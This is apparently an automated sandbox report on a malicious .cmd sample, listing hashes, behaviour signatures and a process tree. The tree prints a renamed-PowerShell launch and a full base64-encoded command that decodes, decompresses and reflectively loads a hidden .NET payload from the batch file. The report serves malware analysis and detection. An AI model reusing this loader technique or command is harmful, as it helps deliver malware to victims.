Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
14/02/2024, 03:43
Static task
static1
Behavioral task
behavioral1
Sample
66437259013770329427019628916414592160995.cmd
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
66437259013770329427019628916414592160995.cmd
Resource
win10v2004-20231215-en
General
-
Target
66437259013770329427019628916414592160995.cmd
-
Size
1.3MB
-
MD5
e21d8e337a80d52e07057207cd5b830d
-
SHA1
752343b5a6ed84bb00025f4289ab47272eab7d51
-
SHA256
74f81ce57b2e9068d2695b61a554a06b77155c94a1345d1cdab13ed6efd185dd
-
SHA512
380b76c4e521fa1f59c90bfc8e94fc87fdb9458d781bac31b1f204634854b020d4dac53838becb90270df73c1fcc88419571db0bded8975f502227fb59294552
-
SSDEEP
24576:OdEhm0FoOBCdKauPkEf5b2JDbXd/+7b0iWba2Qy714X4tD4bzM:fUuxf52U0iWesF
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1864 Xdpzaqc.png -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1864 Xdpzaqc.png 1864 Xdpzaqc.png -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1864 Xdpzaqc.png -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1864 Xdpzaqc.png -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 2976 wrote to memory of 4252 2976 cmd.exe 85 PID 2976 wrote to memory of 4252 2976 cmd.exe 85 PID 2976 wrote to memory of 4116 2976 cmd.exe 86 PID 2976 wrote to memory of 4116 2976 cmd.exe 86 PID 2976 wrote to memory of 1776 2976 cmd.exe 87 PID 2976 wrote to memory of 1776 2976 cmd.exe 87 PID 1776 wrote to memory of 780 1776 cmd.exe 89 PID 1776 wrote to memory of 780 1776 cmd.exe 89 PID 1776 wrote to memory of 448 1776 cmd.exe 90 PID 1776 wrote to memory of 448 1776 cmd.exe 90 PID 1776 wrote to memory of 1624 1776 cmd.exe 91 PID 1776 wrote to memory of 1624 1776 cmd.exe 91 PID 1776 wrote to memory of 1508 1776 cmd.exe 92 PID 1776 wrote to memory of 1508 1776 cmd.exe 92 PID 1776 wrote to memory of 1864 1776 cmd.exe 93 PID 1776 wrote to memory of 1864 1776 cmd.exe 93 PID 1776 wrote to memory of 1864 1776 cmd.exe 93
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\66437259013770329427019628916414592160995.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:4252
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png2⤵PID:4116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\66437259013770329427019628916414592160995.cmd"2⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:780
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png3⤵PID:448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1624
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\66437259013770329427019628916414592160995.cmd C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png.bat3⤵PID:1508
-
-
C:\Users\Admin\AppData\Local\Temp\Xdpzaqc.pngC:\Users\Admin\AppData\Local\Temp\Xdpzaqc.png -win 1 -enc JABLAGkAdQBtAGUAawBwAGQAeABpAHAAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQASABmAGkAegBpAGwAawByAG0AaAB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEsAaQB1AG0AZQBrAHAAZAB4AGkAcAApADsAJABOAGMAZAB1AHoAawB1AGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEgAZgBpAHoAaQBsAGsAcgBtAGgAegAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABBAGgAbABjAGwAegBvAGsAZABuAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQATgBjAGQAdQB6AGsAdQBpACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABBAGgAbABjAGwAegBvAGsAZABuAGMALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEEAaABsAGMAbAB6AG8AawBkAG4AYwAuAEMAbABvAHMAZQAoACkAOwAkAE4AYwBkAHUAegBrAHUAaQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEgAZgBpAHoAaQBsAGsAcgBtAGgAegAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABIAGYAaQB6AGkAbABrAHIAbQBoAHoAKQA7ACAAJABEAHAAbABpAGEAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABIAGYAaQB6AGkAbABrAHIAbQBoAHoAKQA7ACAAJABFAHkAYwBwAHYAbQB4AHgAagB0AGkAIAA9ACAAJABEAHAAbABpAGEAbAAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAFcAdAB2AHcAZgAgAD0AIAAkAEUAeQBjAHAAdgBtAHgAeABqAHQAaQAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1864
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD575d8066ab4aa32752f5202177195b8c3
SHA1ef9c736b5c6ff2638e9a170b6698b6f173490604
SHA256a8b298afeea79efe0bb194cc9e2d7275ae7ae8f08a104320b865c7b12c19c835
SHA512ecc53345d4cc8f676d819c06e025d694aa0aa357c13680140599d297bb99e0dff10c8512e5cacbb28d72be5dbe5e8bf1e8fa029c2e03a53e70f01117c347c12c
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
1.3MB
MD5e21d8e337a80d52e07057207cd5b830d
SHA1752343b5a6ed84bb00025f4289ab47272eab7d51
SHA25674f81ce57b2e9068d2695b61a554a06b77155c94a1345d1cdab13ed6efd185dd
SHA512380b76c4e521fa1f59c90bfc8e94fc87fdb9458d781bac31b1f204634854b020d4dac53838becb90270df73c1fcc88419571db0bded8975f502227fb59294552
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82